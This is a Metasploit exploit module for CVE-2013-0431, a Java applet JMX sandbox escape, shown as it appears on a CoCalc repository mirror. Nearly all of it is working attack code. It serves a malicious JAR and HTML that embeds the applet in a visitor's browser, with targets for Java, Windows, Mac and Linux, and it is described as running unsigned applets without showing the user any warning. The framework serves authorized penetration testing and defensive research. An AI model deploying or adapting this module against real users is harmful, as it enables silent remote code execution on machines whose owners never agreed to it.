Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb
31955 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11


12
  # include Msf::Exploit::Remote::BrowserAutopwn

13
  # autopwn_info({ :javascript => false })

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Java Applet JMX Remote Code Execution',

20
        'Description' => %q{

21
          This module abuses the JMX classes from a Java Applet to run arbitrary Java code

22
          outside of the sandbox as exploited in the wild in February of 2013. Additionally,

23
          this module bypasses default security settings introduced in Java 7 Update 10 to run

24
          unsigned applet without displaying any warning to the user.

25
        },

26
        'License' => MSF_LICENSE,

27
        'Author' => [

28
          'Unknown', # Vulnerability discovery and exploit in the wild

29
          'Adam Gowdiak', # Vulnerability discovery

30
          'SecurityObscurity', # Exploit analysis and deobfuscation

31
          'juan vazquez' # Metasploit module

32
        ],

33
        'References' => [

34
          [ 'CVE', '2013-0431' ],

35
          [ 'OSVDB', '89613' ],

36
          [ 'BID', '57726' ],

37
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ],

38
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ],

39
          [ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ],

40
          [ 'URL', 'http://pastebin.com/QWU1rqjf' ],

41
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ]

42
        ],

43
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

44
        'Targets' => [

45
          [

46
            'Generic (Java Payload)',

47
            {

48
              'Platform' => ['java'],

49
              'Arch' => ARCH_JAVA

50
            }

51
          ],

52
          [

53
            'Windows x86 (Native Payload)',

54
            {

55
              'Platform' => 'win',

56
              'Arch' => ARCH_X86

57
            }

58
          ],

59
          [

60
            'Mac OS X x86 (Native Payload)',

61
            {

62
              'Platform' => 'osx',

63
              'Arch' => ARCH_X86

64
            }

65
          ],

66
          [

67
            'Linux x86 (Native Payload)',

68
            {

69
              'Platform' => 'linux',

70
              'Arch' => ARCH_X86

71
            }

72
          ],

73
        ],

74
        'DefaultTarget' => 0,

75
        'DisclosureDate' => '2013-01-19',

76
        'Notes' => {

77
          'Reliability' => UNKNOWN_RELIABILITY,

78
          'Stability' => UNKNOWN_STABILITY,

79
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

80
        }

81
      )

82
    )

83
  end

84


85
  def on_request_uri(cli, request)

86
    print_status("handling request for #{request.uri}")

87


88
    case request.uri

89
    when /\.jar$/i

90
      print_status('Sending JAR')

91
      send_response(cli, generate_jar, { 'Content-Type' => 'application/octet-stream' })

92
    when %r{/$}

93
      print_status('Sending HTML')

94
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })

95
    else

96
      send_redirect(cli, get_resource + '/', '')

97
    end

98
  end

99


100
  def generate_jar

101
    paths = [

102
      [ 'Exploit.ser' ],

103
      [ 'Exploit.class' ],

104
      [ 'B.class' ]

105
    ]

106


107
    p = regenerate_payload(cli)

108


109
    jar = p.encoded_jar

110


111
    paths.each do |path|

112
      1.upto(path.length - 1) do |idx|

113
        full = path[0, idx].join('/') + '/'

114
        if !(jar.entries.map { |e| e.name }.include?(full))

115
          jar.add_file(full, '')

116
        end

117
      end

118
      fd = File.open(File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-0431', path), 'rb')

119
      data = fd.read(fd.stat.size)

120
      jar.add_file(path.join('/'), data)

121
      fd.close

122
    end

123
    return jar.pack

124
  end

125


126
  def generate_html

127
    html = <<~EOF

128
      <html>

129
      <script language="Javascript">

130


131
      var _app = navigator.appName;

132


133
      if (_app == 'Microsoft Internet Explorer') {

134
      document.write('<applet archive="#{rand_text_alpha(rand(4..7))}.jar" object="Exploit.ser"></applet>');

135
      } else {

136
      document.write('<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="#{rand_text_alpha(rand(4..7))}.jar"></embed>');

137
      }

138


139
      </script>

140
      </html>

141
    EOF

142
    return html

143
  end

144
end

145


146